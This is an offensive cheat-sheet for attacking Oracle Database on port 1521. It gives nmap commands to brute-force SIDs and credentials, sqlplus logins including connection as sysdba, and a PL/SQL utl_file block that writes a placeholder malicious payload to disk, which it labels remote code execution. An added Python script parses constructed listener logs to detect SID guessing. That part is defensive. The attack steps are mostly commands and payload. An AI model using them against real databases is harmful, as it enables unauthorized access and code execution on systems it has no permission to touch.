Oracle Database
Port: 1521
Protocol: tcp
Description
The idea is to enumerate the SID, then enumerate the users and finally connect to the database.
If the privileges allow it, it is possible to connect as sysdba and load a malicious file.
SID bruteforce
nmap --script oracle-sid-brute ${ip}
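Detection side of the SID bruteforce above, as an added example (not part of the original cheat-sheet): every wrong SID guess is written to the listener log with return code 12505, so one client missing on many distinct SIDs stands out. The log lines are constructed and assume the classic " * "-separated text listener.log layout; the function name and threshold are hypothetical.

```python
import re
from collections import defaultdict

# Constructed listener.log excerpt (assumed classic text layout), not from a real host.
SAMPLE_LOG = """\
12-MAR-2024 10:15:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.66)(PORT=40110)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 10:15:01 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.66)(PORT=40111)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 10:15:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.66)(PORT=40112)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 10:15:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.66)(PORT=40113)) * establish * XE * 0
12-MAR-2024 10:20:40 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=ws01)(USER=alice))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.20)(PORT=51234)) * establish * XEE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
12-MAR-2024 10:20:55 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=ws01)(USER=alice))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.20)(PORT=51240)) * establish * XE * 0
"""

SID_RE = re.compile(r"\(SID=([^)]*)\)")
HOST_RE = re.compile(r"\(HOST=([^)]*)\)")
UNKNOWN_SID = "12505"  # TNS-12505: listener does not know the requested SID


def find_sid_guessing(log_text, threshold=3):
    """Return {client_ip: sorted unknown SIDs} for clients with >= threshold distinct misses."""
    misses = defaultdict(set)
    for line in log_text.splitlines():
        # Fields: timestamp, CONNECT_DATA, ADDRESS, event, service, return code
        fields = [f.strip() for f in line.split(" * ")]
        if len(fields) != 6 or fields[3] != "establish":
            continue  # skips the TNS-12505 message lines and non-connect events
        if fields[5] != UNKNOWN_SID:
            continue
        sid = SID_RE.search(fields[1])    # requested SID from CONNECT_DATA
        host = HOST_RE.search(fields[2])  # source address from ADDRESS, not the client-supplied CID host
        if sid and host:
            misses[host.group(1)].add(sid.group(1).upper())
    return {ip: sorted(s) for ip, s in misses.items() if len(s) >= threshold}


if __name__ == "__main__":
    for ip, sids in find_sid_guessing(SAMPLE_LOG).items():
        print(f"{ip}: {len(sids)} unknown SIDs requested: {', '.join(sids)}")
```

A single typo (192.0.2.20 asking for XEE) stays below the threshold; the success line for 192.0.2.66 right after its misses is the event to follow up on.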
Creds bruteforce
# Default creds list : /usr/share/nmap/nselib/data/oracle-default-accounts.lst
# Use brute.credfile to load specific user/password list
nmap --script oracle-brute --script-args oracle-brute.sid=${oracleSID} ${ip}
SQLPlus
# Connection with the user
sqlplus ${user}/${pass}@${ip}:${port}/${SID}
# Connection with the user but with sysdba privileges
sqlplus ${user}/${pass}@${ip}:${port}/${SID} as sysdba
RCE through SQL
The / at the end of the payload is mandatory: on a line by itself, it tells SQL*Plus to run the PL/SQL block.
declare
f utl_file.file_type;
s varchar(5000) := '${maliciousContent}';
begin
f := utl_file.fopen(${path}, ${file}, 'W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/